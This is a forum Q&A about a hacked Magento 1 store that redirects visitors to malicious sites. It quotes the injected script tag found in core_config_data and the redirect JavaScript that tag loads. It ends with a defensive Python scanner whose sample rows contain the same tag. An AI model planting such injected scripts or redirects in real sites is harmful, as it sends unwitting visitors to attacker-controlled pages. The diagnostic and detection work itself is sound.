Magento 1 – Fix Website Redirecting to Another URL

magento-1, redirect, url

Maybe it's infected by some virus.

My website started redirecting to these infected URLs:

http://mon.setsu.xyz
and sometimes https://tiphainemollard.us/index/?1371499155545

What I did to solve it:

  1. Commented out the .htaccess file (nothing happened)
  2. Commented out the include folder (nothing happened)
  3. Scanned the complete server (nothing happened, no virus or malware found)
  4. Changed the CSS, media and JS paths from the database, just to check whether PHP or some JS was doing it (nothing happened)
  5. select * from core_config_data where path like '%secure%'; all links are OK

UPDATE

I googled and found many articles written on this, but they suggest it was a browser issue or that my system is infected (an article on this).
Even if I open the site on my phone or on my personal laptop, the issues are the same.

UPDATE 2

I found the row in the database which is affected (as Boris K. is also saying).

In the core_config_data table, the design/head/includes value has a

<script src="https://melissatgmt.us/redirect_base/redirect.js" id="1371499155545"></script>

which will be inserted in the head section on page load.

If you visit the above URL you will get a redirect script, which is:

    var redirChrome;
    var isToChrome = document.currentScript.getAttribute('data-type');

    if ((isToChrome == 1 && navigator.userAgent.indexOf("Chrome") != -1) || !isToChrome) {
        var idToRedirect = document.currentScript.getAttribute('id');

        window.location.replace('https://tiphainemollard.us/index/?' + idToRedirect);
    }

The client's website has been working since the afternoon, once I removed that script. But the main problem is how that script got inserted into the database.

One patch was also outdated, so I updated that patch as well.

UPDATE 3
The site is infected again.
This is the script inserted in the Admin section (Admin->Configuration->General->Design->HTML Head->Miscellaneous Script):
[screenshot: admin]

And in the database column:
[screenshot: database]

I don't know what to do now, as I have changed every password and deleted all old users.

UPDATE 3

Till now that error hasn't come back, so it means that by following the above steps we can overcome this issue.

UPDATE 4
Always install patches, as it helps me in projects to make the store less prone to these types of issues, and patches are important as well.
One can use https://magescan.com/ to check the issues on their website.

Best Answer

I found the injected code in the core_config_data table, under design/head/includes. Removed it and now the site is back to normal.

UPDATE: As everyone else mentioned, it happened again this morning. This time I got rid of it more easily from the Admin Panel under System > Configuration > General > Design > HTML Head > Miscellaneous Scripts. This is a huge vulnerability, I hope Magento is working on a patch.

UPDATE 2: The script came back again, so I changed the db password and cleared the cache. About an hour later, the script is back. So I don't think it's being added through the db. I just changed my admin password, let's see if it comes back again.

UPDATE 3: Since I changed the admin password yesterday on both of my affected sites, about 24 hours later both are still clean.
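
A defender-side check for the injection described in this thread, as an added example that is not part of the original posts: it scans rows exported from core_config_data for `<script>` tags that load from hosts outside an allowlist, or that carry inline code. The allowlisted hostnames, the config_id values and the design/footer/absolute_footer row are constructed assumptions; only the design/head/includes value comes from the question.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts this store legitimately loads scripts from.
ALLOWED_HOSTS = {"shop.example.com", "cdn.example.com"}


class ScriptCollector(HTMLParser):
    """Collect <script> tags found in one core_config_data value."""

    def __init__(self):
        super().__init__()
        self.sources = []  # src attribute of each <script src=...>
        self.inline = 0    # number of <script> tags without a src

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.sources.append(src)
        else:
            self.inline += 1


def audit_rows(rows, allowed_hosts=ALLOWED_HOSTS):
    """Return (config_id, path, reason) for every suspicious row."""
    findings = []
    for config_id, path, value in rows:
        parser = ScriptCollector()
        parser.feed(value or "")
        parser.close()
        for src in parser.sources:
            host = urlparse(src).hostname  # None for relative, same-origin paths
            if host and host.lower() not in allowed_hosts:
                findings.append((config_id, path, "external script from " + host.lower()))
        if parser.inline:
            findings.append((config_id, path, "inline script"))
    return findings


# Constructed sample rows: (config_id, path, value).
SAMPLE_ROWS = [
    (12, "web/secure/base_url", "https://shop.example.com/"),
    (87, "design/head/includes",
     '<script src="https://melissatgmt.us/redirect_base/redirect.js" id="1371499155545"></script>'),
    (88, "design/footer/absolute_footer", '<script src="https://cdn.example.com/a.js"></script>'),
]

if __name__ == "__main__":
    for finding in audit_rows(SAMPLE_ROWS):
        print(finding)
```

Run on a schedule against a fresh export of the table, this reports the reinfection reported in the updates above as soon as the value changes, instead of when visitors start being redirected.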
